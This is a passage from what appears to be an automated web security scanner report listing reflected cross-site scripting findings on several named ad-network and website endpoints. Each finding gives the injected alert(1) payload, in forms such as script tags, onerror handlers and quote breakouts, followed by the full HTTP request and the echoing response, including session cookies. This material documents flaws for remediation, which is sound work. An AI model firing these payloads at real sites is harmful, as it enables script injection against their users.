Expires: Tue, 19 Apr 2011 02:15:52 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91

<!-- campaign : 'landinga357e<x style=x:expression(alert(1))>1c33ad700db' *not* found -->

3.287. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81dbd'%3balert(1)//e680994464c was submitted in the admeld_callback parameter. This input was echoed as 81dbd';alert(1)//e680994464c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld_sync?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match81dbd'%3balert(1)//e680994464c HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/728x90/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/d56a8ca8-fcd6-4f11-be56-d400a24d3999?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349044
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: subID="{}"; impressions="{\"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]}"; camp_freq_p1="eJzjkuHYeZ9ZgFFi1vy1b1kUGDVmNax/y2LAaAHmAwCZegsN"; io_freq_p1="eJzjEubY6yLAKDFr/tq3LAaMFmAaAEN9B2c="; dp_rec="{\"2\": 1303072666}"; uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; segments_p1="eJzjYuF4+ogRAATqAd8="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Thu, 21 Apr 2011 01:28:13 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Thu, 21-Apr-2011 01:27:53 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 209

document.write('<img width="0" height="0" src="http://tag.admeld.com/match81dbd';alert(1)//e680994464c?admeld_adprovider_id=300&external_user_id=8218888f-9a83-4760-bd14-33b4666730c0&Expiration=1303781293"/>
...[SNIP]...

3.288. http://poponthepop.us.intellitxt.com/al.asp [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://poponthepop.us.intellitxt.com
Path:   /al.asp

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b8d8a%3balert(1)//f1d879267e4 was submitted in the jscallback parameter. This input was echoed as b8d8a;alert(1)//f1d879267e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /al.asp?ts=20110421012512&cc=us&hk=1&ipid=21220&mh=23fbc92b375044f6e48954aaf7ff6be1&pvm=2b40ab9f4209a04c1b7597f4878f8779&pvu=1FD6D8A38F2140AF8F8ECC153C537616&rcc=us&so=0&prf=ll%3A396%7Cintl%3A1796%7Cpreprochrome%3A3%7Cgetconchrome%3A22%7Cadvint%3A1825%7Cadvl%3A1825%7Ctl%3A1825&jscallback=$iTXT.js.callback1b8d8a%3balert(1)//f1d879267e4 HTTP/1.1
Host: poponthepop.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://poponthepop.com/2011/04/lindsay-lohan-loses-victoria-gotti-role/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7KQEAAAEvdagVQQA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7KQEAAAEvdagVQQA-; Domain=.intellitxt.com; Expires=Mon, 20-Jun-2011 01:33:58 GMT; Path=/
Content-Type: text/javascript
Content-Length: 65
Date: Thu, 21 Apr 2011 01:33:58 GMT
Age: 0
Connection: keep-alive

try{$iTXT.js.callback1b8d8a;alert(1)//f1d879267e4();}catch(e){}

3.289. http://poponthepop.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://poponthepop.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7bce9'-alert(1)-'538c5377ece was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /intellitxt/front.asp?ipid=21220&7bce9'-alert(1)-'538c5377ece=1 HTTP/1.1
Host: poponthepop.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://poponthepop.com/2011/04/lindsay-lohan-loses-victoria-gotti-role/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7JQEAAAEvZdzqjQA-

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7KQIAAAEvdavz8QA-; Domain=.intellitxt.com; Expires=Mon, 20-Jun-2011 01:28:14 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7KQIAAAEvdavz8QA-; Domain=.intellitxt.com; Expires=Mon, 20-Jun-2011 01:28:14 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 11428
Date: Thu, 21 Apr 2011 01:28:14 GMT
Age: 0
Connection: keep-alive

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...
"http://b.scorecardresearch.com/b?c1=8&c2=6000002&c3=30000&c4=&c5=&c6=&c15=&cv=1.3&cj=1&rn=20110421012814";})();$iTXT.js.serverUrl='http://poponthepop.us.intellitxt.com';$iTXT.js.pageQuery='ipid=21220&7bce9'-alert(1)-'538c5377ece=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();};
}

3.290. http://poponthepop.us.intellitxt.com/v4/init [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://poponthepop.us.intellitxt.com
Path:   /v4/init

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2db01%3balert(1)//1dfaee7166e was submitted in the jscallback parameter. This input was echoed as 2db01;alert(1)//1dfaee7166e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1303349111247&pagecl=62730&fv=10&muid=&refurl=http%3A%2F%2Fpoponthepop.com%2F2011%2F04%2Flindsay-lohan-loses-victoria-gotti-role%2F&ipid=21220&jscallback=$iTXT.js.callback02db01%3balert(1)//1dfaee7166e HTTP/1.1
Host: poponthepop.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://poponthepop.com/2011/04/lindsay-lohan-loses-victoria-gotti-role/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7KQEAAAEvdagVQQA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 6500
Date: Thu, 21 Apr 2011 01:33:38 GMT
Age: 0
Connection: keep-alive

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
arams.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');$iTXT.data.Dom.detectSearchEngines();try{$iTXT.js.callback02db01;alert(1)//1dfaee7166e({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}

3.291. http://poponthepop.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://poponthepop.us.intellitxt.com
Path:   /v4/init

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c33fc"-alert(1)-"9c05fb4ee52 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1303349111247&pagecl=62730&fv=10&muid=&refurl=http%3A%2F%2Fpoponthepop.com%2F2011%2F04%2Flindsay-lohan-loses-victoria-gotti-role%2F&ipid=21220&jscallback=$iTXT.js.callback0&c33fc"-alert(1)-"9c05fb4ee52=1 HTTP/1.1
Host: poponthepop.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://poponthepop.com/2011/04/lindsay-lohan-loses-victoria-gotti-role/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7KQEAAAEvdagVQQA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 6481
Date: Thu, 21 Apr 2011 01:34:21 GMT
Age: 0
Connection: keep-alive

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
|undefined==$iTXT.glob.dbgParams){$iTXT.glob.dbgParams=new $iTXT.data.Param($iTXT.glob.dbParams,undefined,undefined,'DEBUG');}$iTXT.glob.dbgParams.set({"pagecl":"62730","fv":"10","ts":"1303349111247","c33fc"-alert(1)-"9c05fb4ee52":"1","dma":623,"POSTCODE":"75207","user-agent":"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16","REGIONNAME":"Texas","muid":""
...[SNIP]...

3.292. http://projects.webappsec.org/w/page-revisions/13246986/Web-Application-Security-Scanner-Evaluation-Criteria [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://projects.webappsec.org
Path:   /w/page-revisions/13246986/Web-Application-Security-Scanner-Evaluation-Criteria

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57c86"><img%20src%3da%20onerror%3dalert(1)>64ff6fcbc40 was submitted in the REST URL parameter 4. This input was echoed as 57c86"><img src=a onerror=alert(1)>64ff6fcbc40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /w/page-revisions/13246986/Web-Application-Security-Scanner-Evaluation-Criteria57c86"><img%20src%3da%20onerror%3dalert(1)>64ff6fcbc40 HTTP/1.1
Host: projects.webappsec.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=133238479.1298670519.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pbj=c141224b73feb9193565e6eeb03e001298670485; pb_perfmon=deleted; __utma=133238479.1282775871.1298670519.1298670519.1298670519.1; __utmc=133238479; __qca=P0-1048600453-1298670520461; __utmb=133238479.1.10.1298670519;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Sat, 26 Feb 2011 02:16:22 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Frame-Options: deny
Expires: Fri, 25 Feb 2011 02:16:21 GMT
Cache-Control: no-cache
Content-Length: 25531

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
<meta http-equiv="cont
...[SNIP]...
<a href="http://projects.webappsec.org/w/page-revisions/13246986/Web-Application-Security-Scanner-Evaluation-Criteria57c86"><img src=a onerror=alert(1)>64ff6fcbc40?show_all=1">
...[SNIP]...

3.293. http://projects.webappsec.org/w/page-revisions/13246986/a [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://projects.webappsec.org
Path:   /w/page-revisions/13246986/a

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8641"><img%20src%3da%20onerror%3dalert(1)>0f2d26e32b6 was submitted in the REST URL parameter 4. This input was echoed as b8641"><img src=a onerror=alert(1)>0f2d26e32b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /w/page-revisions/13246986/ab8641"><img%20src%3da%20onerror%3dalert(1)>0f2d26e32b6 HTTP/1.1
Host: projects.webappsec.org
Proxy-Connection: keep-alive
Referer: http://projects.webappsec.org/w/page-revisions/13246986/Web-Application-Security-Scanner-Evaluation-Criteria57c86%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3E64ff6fcbc40
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pbj=c141224b73feb9193565e6eeb03e001298670485; __qca=P0-1048600453-1298670520461; __utmz=133238479.1298686864.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=133238479.1282775871.1298670519.1298670519.1298686864.2; __utmc=133238479; __utmb=133238479.1.10.1298686864

Response

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Sat, 26 Feb 2011 02:31:30 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Frame-Options: deny
Expires: Fri, 25 Feb 2011 02:31:30 GMT
Cache-Control: no-cache
Content-Length: 25423

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
<meta http-equiv="cont
...[SNIP]...
<a href="http://projects.webappsec.org/w/page-revisions/13246986/ab8641"><img src=a onerror=alert(1)>0f2d26e32b6?show_all=1">
...[SNIP]...

3.294. http://pubads.g.doubleclick.net/gampad/ads [slotname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /gampad/ads

Issue detail

The value of the slotname request parameter is copied into the HTML document as plain text between tags. The payload f0150<script>alert(1)</script>d9fc77691a6 was submitted in the slotname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gampad/ads?correlator=1298497010810&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-4809460702016037&slotname=KOMO_Homepage_Hyperlocal_Ad_Slot_IP_300x250f0150<script>alert(1)</script>d9fc77691a6&page_slots=KOMO_Homepage_Hyperlocal_Ad_Slot_IP_300x250&cookie_enabled=1&ga_vid=758392942.1298497003&ga_sid=1298497003&ga_hid=1659860762&ga_fc=true&url=http%3A%2F%2Fwww.komonews.com%2F&lmt=1298518211&dt=1298497010811&cc=33&biw=1210&bih=642&ifi=1&adk=2142605729&u_tz=-360&u_his=1&u_java=true&u_h=768&u_w=1364&u_ah=724&u_aw=1364&u_cd=16&u_nplug=9&u_nmime=44&flash=10.2.154 HTTP/1.1
Host: pubads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.komonews.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Wed, 23 Feb 2011 21:38:36 GMT
Server: gfp-be
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 2773

GA_googleSetAdContentsBySlotForSync({"KOMO_Homepage_Hyperlocal_Ad_Slot_IP_300x250f0150<script>alert(1)</script>d9fc77691a6":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\x3chtml\x3e\x3chead\x3e\x3cstyle\x3ea:link{color:#f
...[SNIP]...

3.295. http://qa.wimgo.com/bloomfield-nm/shopping/musical-instruments/x22 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://qa.wimgo.com
Path:   /bloomfield-nm/shopping/musical-instruments/x22

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2093"-alert(1)-"0fd1d4f72b0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bloomfield-nm/shopping/musical-instrumentse2093"-alert(1)-"0fd1d4f72b0/x22 HTTP/1.1
Host: qa.wimgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:18:38 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.3 ZendServer/5.0
Set-Cookie: PHPSESSID=g7r6tdiihg9dd8pt4okfrb2rh7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: _g=anZ6dGJcaGd2eVxUcmI%3D%3AcGJoYWdlbFBicXI9SEYmcGJoYWdlbEFuenI9SGF2Z3JxK0ZnbmdyZiZlcnR2YmE9R0smcHZnbD1Rbnl5bmYmY2JmZ255UGJxcj03NTIwNyZ5bmd2Z2hxcj0zMi43ODI1JnliYXR2Z2hxcj0tOTYuODIwNyZuZXJuUGJxcj0yMTQmcXpuUGJxcj02MjMmcGJoYWdlbFBicXIzPUhGTiZtdmM9NzUyMDcmZmduZ3I9R0s%3D; expires=Sat, 26-Feb-2011 03:18:38 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _cc=SnZ6dGJfWmJxcnlfWWJwbnlfUHZnbA%3D%3D%3ANjQyOA%3D%3D; expires=Sat, 26-Feb-2011 03:18:38 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _c=2483; expires=Sat, 26-Feb-2011 03:18:38 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _cc=SnZ6dGJfWmJxcnlfWWJwbnlfUHZnbA%3D%3D%3AMjQ4Mw%3D%3D; expires=Sat, 26-Feb-2011 03:18:38 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _g=anZ6dGJcaGd2eVxUcmI%3D%3AeW5ndmdocXI9MzYuNzEwNzIyJnliYXR2Z2hxcj0tMTA3Ljk4MjY2OCZwdmdsPU95YmJ6c3ZyeXEmZmduZ3I9QVo%3D; expires=Sat, 26-Feb-2011 03:18:38 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _r=10; expires=Sat, 26-Feb-2011 03:18:38 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _r=10; expires=Sat, 26-Feb-2011 03:18:38 GMT; path=/; domain=qa.wimgo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56166

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...
" ) );
});
$( "#slider" ).bind( "slidechange", function(event, ui) {
setRadius( $(this).slider( "option", "value" ) );
radiusUrl = "/bloomfield-nm/shopping/musical-instrumentse2093"-alert(1)-"0fd1d4f72b0/x22?radius=RADIUS";
radiusUrl = radiusUrl.replace( 'RADIUS', $(this).slider( "option", "value" ) );
window.location = radiusUrl;
});
$( "select.f-left" ).change(function () {

...[SNIP]...

3.296. http://qa.wimgo.com/bloomfield-nm/shopping/musical-instruments/x22 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://qa.wimgo.com
Path:   /bloomfield-nm/shopping/musical-instruments/x22

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec907"><script>alert(1)</script>dfc89eb5c90 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bloomfield-nm/shopping/musical-instrumentsec907"><script>alert(1)</script>dfc89eb5c90/x22 HTTP/1.1
Host: qa.wimgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:18:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.3 ZendServer/5.0
Set-Cookie: PHPSESSID=el4ekel9u3jv3uo8qkc3utlk77; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: _g=anZ6dGJcaGd2eVxUcmI%3D%3AcGJoYWdlbFBicXI9SEYmcGJoYWdlbEFuenI9SGF2Z3JxK0ZnbmdyZiZlcnR2YmE9R0smcHZnbD1Rbnl5bmYmY2JmZ255UGJxcj03NTIwNyZ5bmd2Z2hxcj0zMi43ODI1JnliYXR2Z2hxcj0tOTYuODIwNyZuZXJuUGJxcj0yMTQmcXpuUGJxcj02MjMmcGJoYWdlbFBicXIzPUhGTiZtdmM9NzUyMDcmZmduZ3I9R0s%3D; expires=Sat, 26-Feb-2011 03:18:26 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _cc=SnZ6dGJfWmJxcnlfWWJwbnlfUHZnbA%3D%3D%3ANjQyOA%3D%3D; expires=Sat, 26-Feb-2011 03:18:26 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _c=2483; expires=Sat, 26-Feb-2011 03:18:26 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _cc=SnZ6dGJfWmJxcnlfWWJwbnlfUHZnbA%3D%3D%3AMjQ4Mw%3D%3D; expires=Sat, 26-Feb-2011 03:18:26 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _g=anZ6dGJcaGd2eVxUcmI%3D%3AeW5ndmdocXI9MzYuNzEwNzIyJnliYXR2Z2hxcj0tMTA3Ljk4MjY2OCZwdmdsPU95YmJ6c3ZyeXEmZmduZ3I9QVo%3D; expires=Sat, 26-Feb-2011 03:18:26 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _r=10; expires=Sat, 26-Feb-2011 03:18:26 GMT; path=/; domain=qa.wimgo.com
Set-Cookie: _r=10; expires=Sat, 26-Feb-2011 03:18:26 GMT; path=/; domain=qa.wimgo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/sch
...[SNIP]...
<a rel="nofollow" href="/bloomfield-nm/shopping/musical-instrumentsec907"><script>alert(1)</script>dfc89eb5c90/x22?navs=39%2C394%2C135%2C80%2C832%2C618%2C0%2C0&nv1=Attractions">
...[SNIP]...

3.297. http://qa.wimgo.com/bloomfield-nm/shopping/musical-instruments/x22 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://qa.wimgo.com
Path:   /bloomfield-nm/shopping/musical-instruments/x22

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a6de"-alert(1)-"b1c598501c5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bloomfield-nm/shopping/musical-instruments/x229a6de"-alert(1)-"b1c598501c5 HTTP/1.1
Host: qa.wimgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:19:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.3 ZendServer/5.0
